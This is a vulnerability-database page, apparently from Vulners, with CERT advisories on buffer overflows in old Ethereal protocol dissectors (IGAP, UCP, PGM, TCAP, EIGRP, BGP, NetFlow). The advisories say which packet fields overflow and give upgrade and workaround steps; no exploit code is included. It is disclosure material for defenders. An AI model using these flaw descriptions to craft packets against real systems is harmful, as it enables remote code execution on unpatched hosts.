Search...

Ethereal IGAP Protocol Dissector Message Overflow

2003-12-10T00:00:00

ID OSVDB:6888
Type osvdb
Reporter Stefan Esser(sesser@hardened-php.net)
Modified 2003-12-10T00:00:00

Description

Vulnerability Description

A remote overflow exists in Ethereal. The IGAP Protocol Dissector fails to check the bounds of the "message" variable resulting in a stack overflow. With a specially crafted request, an attacker can potentially execute arbitrary code resulting in a loss of integrity.

Solution Description

Upgrade to version 0.10.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector

Short Description

References:

JSON Vulners Source

Initial Source

{"title": "Ethereal IGAP Protocol Dissector Message Overflow", "published": "2003-12-10T00:00:00", "references": [], "type": "osvdb", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "cvelist": ["CVE-2004-0176"], "viewCount": 0, "affectedSoftware": [{"version": "0.8.20", "name": "Ethereal", "operator": "eq"}, {"version": "0.8.16", "name": "Ethereal", "operator": "eq"}, {"version": "0.8.15", "name": "Ethereal", "operator": "eq"}, {"version": "0.8.14", "name": "Ethereal", "operator": "eq"}, {"version": "0.8.19", "name": "Ethereal", "operator": "eq"}, {"version": "0.9.x", "name": "Ethereal", "operator": "eq"}, {"version": "0.8.18", "name": "Ethereal", "operator": "eq"}, {"version": "0.8.17-a", "name": "Ethereal", "operator": "eq"}], "hash": "91e70fe56deef32930b8d1228beab1fdad2dbffe795a858c227ef1ff862b2204", "id": "OSVDB:6888", "modified": "2003-12-10T00:00:00", "history": [], "href": "https://vulners.com/osvdb/OSVDB:6888", "hashmap": [{"hash": "f679d346800ff98988cf10aee9c75cac", "key": "affectedSoftware"}, {"hash": "f9fa10ba956cacf91d7878861139efb9", "key": "bulletinFamily"}, {"hash": "e998f0afc810c7ebcdaded3f1ca5951d", "key": "cvelist"}, {"hash": "84813b1457b92d6ba1174abffbb83a2f", "key": "cvss"}, {"hash": "5880c21c1307d22adbbd03724755f963", "key": "description"}, {"hash": "2236c2aa1c6fccd360ba02f2fd5b418b", "key": "href"}, {"hash": "fde9a25ef7fddb3d06e1a9716f235df9", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "fde9a25ef7fddb3d06e1a9716f235df9", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "93ba29132b36a861ff8404af2e08dae6", "key": "reporter"}, {"hash": "ea112473ca61e9aa42366cc9a54fe5fb", "key": "title"}, {"hash": "1327ac71f7914948578f08c54f772b10", "key": "type"}], "objectVersion": "1.2", "edition": 1, "description": "## Vulnerability Description\nA remote overflow exists in Ethereal. The IGAP Protocol Dissector fails to check the bounds of the \"message\" variable resulting in a stack overflow. With a specially crafted request, an attacker can potentially execute arbitrary code resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 0.10.0 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: Disable the dissector\n## Short Description\nA remote overflow exists in Ethereal. The IGAP Protocol Dissector fails to check the bounds of the \"message\" variable resulting in a stack overflow. With a specially crafted request, an attacker can potentially execute arbitrary code resulting in a loss of integrity.\n## References:\nVendor URL: http://www.ethereal.com/\n[Vendor Specific Advisory URL](http://www.debian.org/security/2004/dsa-511)\n[Vendor Specific Advisory URL](http://www.mandrakesoft.com/security/advisories?name=MDKSA-2004:024)\n[Vendor Specific Advisory URL](http://www.ethereal.com/appnotes/enpa-sa-00013.html)\n[Vendor Specific Advisory URL](http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835)\n[Secunia Advisory ID:11744](https://secuniaresearch.flexerasoftware.com/advisories/11744/)\n[Related OSVDB ID: 6893](https://vulners.com/osvdb/OSVDB:6893)\n[Related OSVDB ID: 4490](https://vulners.com/osvdb/OSVDB:4490)\n[Related OSVDB ID: 6887](https://vulners.com/osvdb/OSVDB:6887)\n[Related OSVDB ID: 6889](https://vulners.com/osvdb/OSVDB:6889)\n[Related OSVDB ID: 6896](https://vulners.com/osvdb/OSVDB:6896)\n[Related OSVDB ID: 6894](https://vulners.com/osvdb/OSVDB:6894)\n[Related OSVDB ID: 6895](https://vulners.com/osvdb/OSVDB:6895)\n[Related OSVDB ID: 6898](https://vulners.com/osvdb/OSVDB:6898)\n[Related OSVDB ID: 6890](https://vulners.com/osvdb/OSVDB:6890)\n[Related OSVDB ID: 6891](https://vulners.com/osvdb/OSVDB:6891)\n[Related OSVDB ID: 6892](https://vulners.com/osvdb/OSVDB:6892)\n[Related OSVDB ID: 6897](https://vulners.com/osvdb/OSVDB:6897)\nRedHat RHSA: RHSA-2004:136-09\nRedHat RHSA: RHSA-2004:137-07\nOther Advisory URL: http://security.e-matters.de/advisories/032004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-03/0227.html\nISS X-Force ID: 15569\n[CVE-2004-0176](https://vulners.com/cve/CVE-2004-0176)\n", "bulletinFamily": "software", "reporter": "Stefan Esser(sesser@hardened-php.net)", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/", "score": 5.0}, "lastseen": "2017-04-28T13:20:01"}

{"cve": [{"lastseen": "2017-10-11T11:05:54", "references": ["http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000835", "http://www.kb.cert.org/vuls/id/119876", "http://www.kb.cert.org/vuls/id/864884", "http://marc.info/?l=bugtraq&m=108007072215742&w=2", "http://www.kb.cert.org/vuls/id/433596", "http://www.kb.cert.org/vuls/id/591820", "http://www.redhat.com/support/errata/RHSA-2004-137.html", "http://www.kb.cert.org/vuls/id/931588", "http://www.debian.org/security/2004/dsa-511", "http://security.gentoo.org/glsa/glsa-200403-07.xml", "http://www.redhat.com/support/errata/RHSA-2004-136.html", "http://www.kb.cert.org/vuls/id/644886", "https://exchange.xforce.ibmcloud.com/vulnerabilities/15569", "http://www.kb.cert.org/vuls/id/125156", "http://www.kb.cert.org/vuls/id/740188", "http://marc.info/?l=bugtraq&m=108213710306260&w=2", "http://marc.info/?l=bugtraq&m=108058005324316&w=2", "http://www.kb.cert.org/vuls/id/659140", "http://security.e-matters.de/advisories/032004.html", "http://www.mandriva.com/security/advisories?name=MDKSA-2004:024", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "description": "Multiple buffer overflows in Ethereal 0.8.13 to 0.10.2 allow remote attackers to cause a denial of service and possibly execute arbitrary code via the (1) NetFlow, (2) IGAP, (3) EIGRP, (4) PGM, (5) IrDA, (6) BGP, (7) ISUP, or (8) TCAP dissectors.", "edition": 4, "reporter": "NVD", "published": "2004-05-04T00:00:00", "title": "CVE-2004-0176", "type": "cve", "enchantments": {"score": {"modified": "2017-10-11T11:05:54", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10187", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10187"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2004-0176"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:887", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:887"}], "modified": "2017-10-10T21:29:22", "cpe": ["cpe:/a:ethereal_group:ethereal:0.9.12", "cpe:/a:ethereal_group:ethereal:0.9.14", "cpe:/a:ethereal_group:ethereal:0.9.6", "cpe:/a:ethereal_group:ethereal:0.8.14", "cpe:/a:ethereal_group:ethereal:0.9.16", "cpe:/a:ethereal_group:ethereal:0.10.1", "cpe:/a:ethereal_group:ethereal:0.9.7", "cpe:/a:ethereal_group:ethereal:0.9.9", "cpe:/a:ethereal_group:ethereal:0.10", "cpe:/a:ethereal_group:ethereal:0.9.10", "cpe:/a:ethereal_group:ethereal:0.9.8", "cpe:/a:ethereal_group:ethereal:0.9.1", "cpe:/a:ethereal_group:ethereal:0.9.11", "cpe:/a:ethereal_group:ethereal:0.9.3", "cpe:/a:ethereal_group:ethereal:0.8.13", "cpe:/a:ethereal_group:ethereal:0.9.5", "cpe:/a:ethereal_group:ethereal:0.9.4", "cpe:/a:ethereal_group:ethereal:0.10.2", "cpe:/a:ethereal_group:ethereal:0.9.2", "cpe:/a:ethereal_group:ethereal:0.8.18", "cpe:/a:ethereal_group:ethereal:0.9.15", "cpe:/a:ethereal_group:ethereal:0.9.13", "cpe:/a:ethereal_group:ethereal:0.8.19", "cpe:/a:ethereal_group:ethereal:0.9"], "id": "CVE-2004-0176", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0176", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cert": [{"lastseen": "2018-08-31T02:37:46", "references": ["http://www.irda.org/", "http://secunia.com/advisories/11185/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176", "http://security.e-matters.de/advisories/032004.html", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "description": "### Overview\n\nEthereal contains a vulnerability in the way the Infrared Data Association (IrDA) dissector plugin parses the IRCOM_PORT_NAME parameter.\n\n### Description\n\nEthereal is a network traffic analysis package. It includes the ability to decode packets containing IrDA data. There is a vulnerability in the way the IrDA dissector plugin decodes the IRCOM_PORT_NAME parameter. By sending an IrDA packet containing an overly long portname, a remote unauthenticated attacker could cause Ethereal to crash or potentially execute code of the attacker's choice. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could cause Ethereal to crash or potentially execute code of the attacker's choice. \n \n--- \n \n### Solution\n\n**Upgrade**\n\nUpgrade to version 0.10.3 or later. \n \nNote: Ethereal is considered BETA software at this time. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nEthereal| | -| 25 Mar 2004 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23740188 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://security.e-matters.de/advisories/032004.html>\n * <http://www.ethereal.com/appnotes/enpa-sa-00013.html>\n * <http://secunia.com/advisories/11185/>\n * <http://www.irda.org/>\n\n### Credit\n\nEthereal credits Stefan Esser for reporting this vulnerability.\n\nThis document was written by Damon Morda.\n\n### Other Information\n\n * CVE IDs: [CAN-2004-0176](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176>)\n * Date Public: 22 Mar 2004\n * Date First Published: 25 Mar 2004\n * Date Last Updated: 06 Apr 2004\n * Severity Metric: 4.04\n * Document Revision: 11\n\n", "edition": 3, "reporter": "CERT", "published": "2004-03-25T00:00:00", "title": "Ethereal IrDA dissector plugin fails to properly parse IRCOM_PORT_NAME parameter", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2004-0176", "CVE-2004-0176"], "modified": "2004-04-06T00:00:00", "id": "VU:740188", "href": "https://www.kb.cert.org/vuls/id/740188", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T02:37:13", "references": ["http://secunia.com/advisories/11185/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176", "http://security.e-matters.de/advisories/032004.html", "http://security.e-matters.de/advisories/032004.html", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "description": "### Overview\n\nEthereal contains multiple buffer overflows in the Universal Control Protocol (UCP) protocol dissector. These vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description\n\nEthereal is a network traffic analysis package. It includes the ability to decode packets containing UCP data. There are three buffer overflow vulnerabilities in the way the UCP protocol dissector decodes packets containing UCP data. These vulnerabilities could be exploited by a remote, unauthenticated attacker by sending a specially crafted UCP packet containing an overly long string, integer, or time field value. Exploitation of these vulnerabilities could result in arbitrary code execution. \n\nAccording to the [e-matters Security Advisory](<http://security.e-matters.de/advisories/032004.html>): \n \n_To exploit this vulnerability over the wire an attacker must be able to fit more than BUFSIZ bytes into one TCP packet. This means it is only exploitable on the wire if the system has a MTU bigger than BUFSIZ. BUFSIZ is 8192 on glibc systems, 1024 on BSD systems and 512 on Windows systems._ \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could execute arbitrary code on the vulnerable system. \n \n--- \n \n### Solution\n\n**Upgrade**\n\nUpgrade to version 0.10.3 or later. \n \nNote: Ethereal is considered BETA software at this time. \n \n--- \n \n \n**Disable Dissector** \n \nIf you are unable to upgrade to version 0.10.3 or later, you can disable the UCP protocol dissector by performing the following actions in Ethereal: \n \n(for Ethereal versions 0.9.x) \n1) Select Edit->Protocols \n2) Deselect the UCP protocol dissector from the list \n \n(for Ethereal versions 0.10.x) \n1) Select Analyze->Enabled Protocols \n2) Disable the UCP protocol dissector from the list by unchecking its \"Status\" checkbox \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nEthereal| | -| 25 Mar 2004 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23125156 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://security.e-matters.de/advisories/032004.html>\n * <http://www.ethereal.com/appnotes/enpa-sa-00013.html>\n * <http://secunia.com/advisories/11185/>\n\n### Credit\n\nEthereal credits Stefan Esser for reporting this vulnerability.\n\nThis document was written by Damon Morda.\n\n### Other Information\n\n * CVE IDs: [CAN-2004-0176](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176>)\n * Date Public: 22 Mar 2004\n * Date First Published: 25 Mar 2004\n * Date Last Updated: 25 Mar 2004\n * Severity Metric: 9.82\n * Document Revision: 9\n\n", "edition": 4, "reporter": "CERT", "published": "2004-03-25T00:00:00", "title": "Ethereal contains multiple vulnerabilities in the UCP protocol dissector", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2004-0176", "CVE-2004-0176"], "modified": "2004-03-25T00:00:00", "id": "VU:125156", "href": "https://www.kb.cert.org/vuls/id/125156", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T02:37:31", "references": ["http://secunia.com/advisories/11185/", "http://www.ietf.org/rfc/rfc3208.txt", "http://www.ietf.org/rfc/rfc3208.txt", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176", "http://security.e-matters.de/advisories/032004.html", "http://security.e-matters.de/advisories/032004.html", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "description": "### Overview\n\nEthereal fails to properly parse Pragmatic General Multicast ([PGM](<http://www.ietf.org/rfc/rfc3208.txt>)) packets containing a crafted negative acknowledgement (NAK) list.\n\n### Description\n\nEthereal is a network traffic analysis package. It includes the ability to decode packets containing PGM data. There is a vulnerability in the way the PGM protocol dissector parses PGM data containing a crafted NAK list. \n\nAccording to the [e-matters Security Advisory](<http://security.e-matters.de/advisories/032004.html>): \n \n_\"When parsing an PGM packet with a carefully crafted NakList a possible integer underflow can result in a very small stack-overflow. Due to the stacklayout code execution exploitation seems very unlikely.\"_ \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could cause Ethereal to crash or possibly execute arbitrary code on the vulnerable system. \n \n--- \n \n### Solution\n\n**Upgrade**\n\nUpgrade to version 0.10.3 or later. \n \nNote: Ethereal is considered BETA software at this time. \n \n--- \n \n \n**Disable Dissector** \n \nIf you are unable to upgrade to version 0.10.3 or later, you can disable the PGM protocol dissector by performing the following actions in Ethereal: \n \n(for Ethereal versions 0.8.x and 0.9.x) \n1) Select Edit->Protocols \n2) Deselect the PGM protocol dissector from the list \n \n(for Ethereal versions 0.10.x) \n1) Select Analyze->Enabled Protocols \n2) Disable the PGM protocol dissector from the list by unchecking its \"Status\" checkbox \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nEthereal| | -| 24 Mar 2004 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23433596 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://security.e-matters.de/advisories/032004.html>\n * <http://www.ethereal.com/appnotes/enpa-sa-00013.html>\n * <http://secunia.com/advisories/11185/>\n * <http://www.ietf.org/rfc/rfc3208.txt>\n\n### Credit\n\nEthereal credits Stefan Esser for reporting this vulnerability.\n\nThis document was written by Damon Morda.\n\n### Other Information\n\n * CVE IDs: [CAN-2004-0176](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176>)\n * Date Public: 22 Mar 2004\n * Date First Published: 24 Mar 2004\n * Date Last Updated: 25 Mar 2004\n * Severity Metric: 4.04\n * Document Revision: 21\n\n", "edition": 4, "reporter": "CERT", "published": "2004-03-24T00:00:00", "title": "Ethereal integer underflow when parsing malformed PGM packets with NAK lists", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2004-0176", "CVE-2004-0176"], "modified": "2004-03-25T00:00:00", "id": "VU:433596", "href": "https://www.kb.cert.org/vuls/id/433596", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T02:37:15", "references": ["http://www.ietf.org/rfc/rfc2865.txt", "http://www.ietf.org/proceedings/99nov/I-D/draft-ietf-sigtran-tcap-perf-req-00.txt", "http://www.ietf.org/proceedings/99nov/I-D/draft-ietf-sigtran-tcap-perf-req-00.txt", "http://www.ietf.org/proceedings/99nov/I-D/draft-ietf-sigtran-tcap-perf-req-00.txt", "http://secunia.com/advisories/11185/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176", "http://security.e-matters.de/advisories/032004.html", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "description": "### Overview\n\nEthereal contains a vulnerability in the way the Transaction Capabilities Application Part ([TCAP](<http://www.ietf.org/proceedings/99nov/I-D/draft-ietf-sigtran-tcap-perf-req-00.txt>)) protocol dissector parses ASN.1 encoded Transaction IDs within TCAP packets.\n\n### Description\n\nEthereal is a network traffic analysis package. It includes the ability to decode packets containing TCAP[](<http://www.ietf.org/rfc/rfc2865.txt>) data. The TCAP protocol is designed to enable advanced network telephony services between signaling points. For instance, when dialing an 800, 888, or 900 number, TCAP is used to determine the routing numbers for these digits. \n\nAccording to an [IETF Draft](<http://www.ietf.org/proceedings/99nov/I-D/draft-ietf-sigtran-tcap-perf-req-00.txt>), \n \n_TCAP messages are designed for accessing databases or other switches to retrieve information or invoke features. TCAP enables the deployment of advanced intelligent network services by supporting non-circuit related information exchange between signaling points using the signaling connection control part (SCCP) connectionless service for message transport._ \n_..._ \n \n_The Transaction ID is a reference to correlate messages within the same transaction and associate the TCAP transaction with a specific application at the originating and destination signaling points._ \n \nThere is a buffer overflow vulnerability in the way the TCAP protocol dissector parses ASN.1 encoded Transaction IDs within TCAP packets. Exploitation of this vulnerability could allow for arbitrary code execution. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could execute arbitrary code on the vulnerable system. \n \n--- \n \n### Solution\n\n**Upgrade** \nUpgrade to version 0.10.3 or later. \n \nNote: Ethereal is considered BETA software at this time. \n \n--- \n \n**Disable Dissector** \n \nIf you are unable to upgrade to version 0.10.3 or later, you can disable the TCAP protocol dissector by performing the following actions in Ethereal: \n \n(for Ethereal versions 0.9.x) \n1) Select Edit->Protocols \n2) Deselect the TCAP protocol dissector from the list \n \n(for Ethereal versions 0.10.x) \n1) Select Analyze->Enabled Protocols \n2) Disable the TCAP protocol dissector from the list by unchecking its \"Status\" checkbox \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nEthereal| | -| 25 Mar 2004 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23591820 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://security.e-matters.de/advisories/032004.html>\n * <http://www.ethereal.com/appnotes/enpa-sa-00013.html>\n * <http://secunia.com/advisories/11185/>\n * <http://www.ietf.org/proceedings/99nov/I-D/draft-ietf-sigtran-tcap-perf-req-00.txt>\n\n### Credit\n\nEthereal credits Stefan Esser for reporting this vulnerability.\n\nThis document was written by Damon Morda.\n\n### Other Information\n\n * CVE IDs: [CAN-2004-0176](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176>)\n * Date Public: 22 Mar 2004\n * Date First Published: 25 Mar 2004\n * Date Last Updated: 25 Mar 2004\n * Severity Metric: 9.82\n * Document Revision: 17\n\n", "edition": 4, "reporter": "CERT", "published": "2004-03-25T00:00:00", "title": "Ethereal fails to properly decode Transaction IDs within TCAP packets", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2004-0176", "CVE-2004-0176"], "modified": "2004-03-25T00:00:00", "id": "VU:591820", "href": "https://www.kb.cert.org/vuls/id/591820", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T02:37:47", "references": ["http://secunia.com/advisories/11185/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176", "http://security.e-matters.de/advisories/032004.html", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "description": "### Overview\n\nEthereal contains multiple vulnerabilities in the Enhanced Interior Gateway Routing Protocol (EIGRP) protocol dissector. These vulnerabilities could allow a remote, unauthenticated attacker to execute arbitrary code.\n\n### Description\n\nEthereal is a network traffic analysis package. It includes the ability to decode packets containing EIGRP data. There are two buffer overflow vulnerabilities in the way the EIGRP protocol dissector decodes packets containing EIGRP data. These vulnerabilities could be exploited by a remote, unauthenticated attacker by sending a specially crafted EIGRP packet containing overly long IP address values. Exploitation of these vulnerabilities could result in arbitrary code execution. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could execute arbitrary code on the vulnerable system. \n \n--- \n \n### Solution\n\n**Upgrade**\n\nUpgrade to version 0.10.3 or later. \n \nNote: Ethereal is considered BETA software at this time. \n \n--- \n \n \n**Disable Dissector** \n \nIf you are unable to upgrade to version 0.10.3 or later, you can disable the EIGRP protocol dissector by performing the following actions in Ethereal: \n \n(for Ethereal versions 0.8.x and 0.9.x) \n1) Select Edit->Protocols \n2) Deselect the EIGRP protocol dissector from the list \n \n(for Ethereal versions 0.10.x) \n1) Select Analyze->Enabled Protocols \n2) Disable the EIGRP protocol dissector from the list by unchecking its \"Status\" checkbox \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nEthereal| | -| 24 Mar 2004 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23119876 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://security.e-matters.de/advisories/032004.html>\n * <http://www.ethereal.com/appnotes/enpa-sa-00013.html>\n * <http://secunia.com/advisories/11185/>\n\n### Credit\n\nEthereal credits Stefan Esser for reporting these vulnerabilities.\n\nThis document was written by Damon Morda.\n\n### Other Information\n\n * CVE IDs: [CAN-2004-0176](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176>)\n * Date Public: 22 Mar 2004\n * Date First Published: 24 Mar 2004\n * Date Last Updated: 25 Mar 2004\n * Severity Metric: 9.82\n * Document Revision: 17\n\n", "edition": 4, "reporter": "CERT", "published": "2004-03-24T00:00:00", "title": "Ethereal contains multiple vulnerabilities in the EIGRP protocol dissector", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2004-0176", "CVE-2004-0176"], "modified": "2004-03-25T00:00:00", "id": "VU:119876", "href": "https://www.kb.cert.org/vuls/id/119876", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T02:36:35", "references": ["http://www.ietf.org/rfc/rfc3031.txt", "http://www.ietf.org/rfc/rfc3031.txt", "http://www.ietf.org/rfc/rfc3031.txt", "http://www.ietf.org/rfc/rfc1772.txt", "http://secunia.com/advisories/11185/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176", "http://security.e-matters.de/advisories/032004.html", "http://security.e-matters.de/advisories/032004.html", "http://www.ietf.org/rfc/rfc1771.txt", "http://www.ietf.org/rfc/rfc1771.txt", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "description": "### Overview\n\nEthereal contains a vulnerability in the way the Border Gateway Protocol ([BGP](<http://www.ietf.org/rfc/rfc1771.txt>)) protocol dissector decodes Multiprotocol Label Switching ([MPLS](<http://www.ietf.org/rfc/rfc3031.txt>)) IPv6 labels.\n\n### Description\n\nEthereal is a network traffic analysis package. It includes the ability to decode packets containing BGP data. According to [RFC3031](<http://www.ietf.org/rfc/rfc3031.txt>), an MPLS label is an identifier used to represent the Forwarding Equivalence Class (FEC) to which that packet is assigned. There is a buffer overflow vulnerability in the way the BGP protocol dissector decodes MPLS IPv6 labels. \n\nAccording to the [e-matters Security Advisory](<http://security.e-matters.de/advisories/032004.html>): \n_When parsing a BGP Packet with a MPLS IPv6 label up to 13 bytes on the stack may be overwritten with arbitrary data. Due to the stacklayout exploitability seems unlikly and was therefore not tested._ \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could cause Ethereal to crash or potentially execute code of the attacker's choice. \n \n--- \n \n### Solution\n\n**Upgrade**\n\nUpgrade to version 0.10.3 or later. \n \nNote: Ethereal is considered BETA software at this time. \n \n--- \n \n**Disable Dissector** \n \nIf you are unable to upgrade to version 0.10.3 or later, you can disable the BGP protocol dissector by performing the following actions in Ethereal: \n \n(for Ethereal versions 0.8.x and 0.9.x) \n1) Select Edit->Protocols \n2) Deselect the BGP protocol dissector from the list \n \n(for Ethereal versions 0.10.x) \n1) Select Analyze->Enabled Protocols \n2) Disable the BGP protocol dissector from the list by unchecking its \"Status\" checkbox \n \nHowever, it is strongly encouraged to upgrade to version 0.10.3 or later. \n \n--- \n \n### Systems Affected \n\nVendor| Status| Date Notified| Date Updated \n---|---|---|--- \nEthereal| | -| 25 Mar 2004 \nIf you are a vendor and your product is affected, [let us know](<mailto:cert@cert.org?Subject=VU%23931588 Vendor Status Inquiry>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | N/A | N/A \n \n### References\n\n * <http://security.e-matters.de/advisories/032004.html>\n * <http://www.ethereal.com/appnotes/enpa-sa-00013.html>\n * <http://secunia.com/advisories/11185/>\n * <http://www.ietf.org/rfc/rfc1771.txt>\n * <http://www.ietf.org/rfc/rfc1772.txt>\n * <http://www.ietf.org/rfc/rfc3031.txt>\n\n### Credit\n\nEthereal credits Stefan Esser for reporting this vulnerability.\n\nThis document was written by Damon Morda.\n\n### Other Information\n\n * CVE IDs: [CAN-2004-0176](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176>)\n * Date Public: 22 Mar 2004\n * Date First Published: 25 Mar 2004\n * Date Last Updated: 25 Mar 2004\n * Severity Metric: 2.89\n * Document Revision: 10\n\n", "edition": 4, "reporter": "CERT", "published": "2004-03-25T00:00:00", "title": "Ethereal fails to properly decode BGP packets containing MPLS IPv6 labels", "type": "cert", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2004-0176", "CVE-2004-0176"], "modified": "2004-03-25T00:00:00", "id": "VU:931588", "href": "https://www.kb.cert.org/vuls/id/931588", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T02:38:05", "references": ["http://secunia.com/advisories/11185/", "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CAN-2004-0176", "http://security.e-matters.de/advisories/032004.html", "http://www.ethereal.com/appnotes/enpa-sa-00013.html"], "description": "### Overview\n\nEthereal fails to properly parse v9_template structures in NetFlow UDP packets with an overly large template_entry count. This could allow an attacker to execute arbitrary code.\n\n### Description\n\nEthereal is a network traffic analysis package. It includes the ability to decode packets containing NetFlow data. There is a buffer overflow vulnerability in the way the NetFlow v9 dissector parses v9_template structures in a NetFlow UDP packet. A remote, unauthenticated attacker could exploit this vulnerability by sending a NetFlow UDP packet containing an overly large template_entry count which could allow for arbitrary code execution. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could execute arbitrary code on the vulnerable system. \n \n--- \n \n### Solution\n\n**Upgrade**\n\nUpgrade to version 0.10.3 or later. \n \nNote: Ethereal is considered BETA software at this time. \n \n--- \n \n \n**Disable Dissector** \n \nIf you are unable to upgrade to version 0.10.3 or later, you can 